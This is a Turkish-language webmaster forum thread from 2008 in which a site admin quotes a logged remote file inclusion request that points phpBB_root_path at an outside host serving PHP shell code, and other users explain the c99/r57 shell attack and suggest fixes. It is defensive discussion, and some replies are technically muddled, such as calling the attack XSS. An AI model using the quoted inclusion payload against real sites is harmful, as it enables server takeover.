Bu Saldırı Hakkında Bilgisi Olan varmı?

polibo06 · Site Yöneticisi Kayıt: Nov 01, 2006 Mesajlar: 2412 Konum: izmirimi özledim

Arkadaşlar çok ilginç bir saldırı gördüm.Bunu ilk defa gördüm ve acaba bir bilen varmıdır diye öğrenmek istedim

sistem:
libwww-perl/5.805

ip adres:
219.94.128.57

adres satırına;

index.php?phpBB_root_path=http://stmikx.freehoxt.com/Sekip/id.txt?

yazıyorlar...bu link ile ne gibi bir saldırı yapıldığını bilen varmı?

Bu Site Google Adsense ile Gelir Elde Ediyor · Tarih: 2024-11-10, 19:43:06 Mesaj konusu: Forum Arası Reklamlar

polibo06 · Tarih: 2008-03-31, 02:17:37 Mesaj konusu:

uzak serverdaki php dosyası;

komutan1905 · Tarih: 2008-03-31, 13:07:01 Mesaj konusu:

bu shell denemesidir...ancak salak lamer becerememiş....

akinci313 · Mesaj: 1+ Kayıt: Dec 29, 2003 Mesajlar: 44 Konum: çanakkale

Benim anladigim kadari XSS acigi üzere shell atip root hakkina ele gecirmeye calismislar.

amanav · Tarih: 2008-03-31, 14:30:37 Mesaj konusu:

polibo sunucunda tehlikeli fonksiyonlar aktif onları devre dışı bırakırsan sorun yaşamazsın başta shell_exec olmak üzere

DiRect · Mesaj: 200+ Kayıt: Jun 24, 2006 Mesajlar: 210

c-99 attack olarak da geçiyo sanırım bu olay, uzak sunucudan dosya çekip sitene bırakıyorlar shell atma olarak. Sonra istedikleri gibi sitende gezebiliyorlar index atabiliyorlar.

Dosyalarını incele içlerinde herhangi göze çarpan bir kod parçacığı var mı? Belkide bırakmışlardır ve saldırıya açıktır.

Sitene shell bırakılıyorsa (bırakılmışsa) hostun fonkiyonlarından olabilir amanav arkadaşın dediği gibi. Gerekirse host firması bile değiştirilebilir.

Sercan · Mesaj: 1000+ Kayıt: Jan 07, 2006 Mesajlar: 1719 Konum: İstanbuL //

serserialper21 · Tarih: 2008-03-31, 22:21:39 Mesaj konusu:

bu arada belirtmek isterım ki shell ile sadece uzak sunucudan c99 scripti ile saldırmayadabılır ki sende oyle yapmıs da fakat bunun dahilinde scripti upload ederek te çalıştırabılır

Server'in safe mod'unu devre dışı bıraktırabılırsenız script çalışmayacaktır bildiğim kadarı ile...

Bu Site Google Adsense ile Gelir Elde Ediyor · Tarih: 2024-11-10, 19:43:06 Mesaj konusu: Forum Arası Reklamlar

seyranli · Tarih: 2008-03-31, 22:26:20 Mesaj konusu:

safe mod on olsa dahi çalışan çeşitleri var bu r57 dosyalarının. açığın sebebini söyleyim size.

adres satırında
phpBB_root_path=http://stmikx.freehoxt.com/Sekip/id.txt?

yazıyor, phpbb_root_path değişkeninni tnaımlıyor, aşağıda

include($phpbb_root_path.'ayar.php');

gibi satırlar var. bu durum da diğer siteden shell içeriğini alıyor, böylece sunucunuz da değişiklik yapabilme hakkına ulaşıyor. google da shell bypass yazarsanız karşıt önlemlerini görürsünüz. kısıtlanması gereken fonksiyonlar var. peki açığı nasıl kapatırım diyorsanız, include satırından önce
$phpbb_root_path='';

eklemeniz yeterli. ben burda boş oalrak atadım, siz diğer sayfalara bakarak doğru olanını eklerseniz böyle bir sorun kalmaz

polibo06 · Tarih: 2008-04-01, 13:55:04 Mesaj konusu:

herkese teşekür ederim umduğumdan bile fazla bilgi vermişsiniz çok teşekürler...ilk önce bu saldırı yemedi..

serverıma güvenim sonsuzdur...

amanav · Tarih: 2008-04-01, 15:43:03 Mesaj konusu:

komutan1905 · Mesaj: 500+ Kayıt: Sep 26, 2005 Mesajlar: 534 Konum: istanbul

Bence sen aşağıdaki kodları .htaccess e ekle böylece serverine her türlü resim php kod dosyalarının girmesini engeller eğer sitende avatar dosya upload varsa çakışır...

asilimy · Tarih: 2008-04-06, 14:23:25 Mesaj konusu:

c99 saldırısı 2 haftadır banada yapılıyor. hosting firmasına belirttim. bakalım ne olacak.. Sad

ulkucudiyari · Tarih: 2008-07-30, 04:18:59 Mesaj konusu:

rootshell denemesi uzakdan shell dosyası ile kontrol

Just · Tarih: 2008-07-30, 12:15:28 Mesaj konusu:

Root girişi yaparak

php.ini de disable_functions satırını bulun ve yanına